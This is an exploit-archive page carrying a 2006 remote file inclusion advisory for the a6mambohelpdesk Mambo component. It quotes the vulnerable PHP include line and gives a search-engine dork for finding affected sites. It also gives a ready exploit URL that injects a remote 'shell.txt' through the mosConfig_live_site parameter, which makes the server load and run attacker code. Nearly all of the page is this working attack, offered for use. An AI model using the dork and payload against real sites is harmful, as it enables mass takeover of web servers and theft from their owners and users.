[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : a6mambohelpdesk Mambo Component <= 18RC1 Include Vulnerability
# Published : 2006-07-27
# Author : Dr.Jr7
# Previous Title : WMNews <= 0.2a (base_datapath) Remote Inclusion Vulnerability
# Next Title : Etomite CMS <= 0.6.1 (username) SQL Injection Exploit (mq = off)
a6mambohelpdesk Mambo Component <= 18RC1 Remote Include Vulnerability
# Rish : High
# Class : Remote
# Script : a6mambohelpdesk
# Thanx : www.lezr.com/vb
# codes
<?
include("$mosConfig_live_site/components/com_a6mambohelpdesk/about.html" );
?>
# d0rkiz : allinurl:"com_a6mambohelpdesk"
http://www.site.com/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://shell.txt
# by Dr.Jr7
# www.Syue.com [2006-07-27]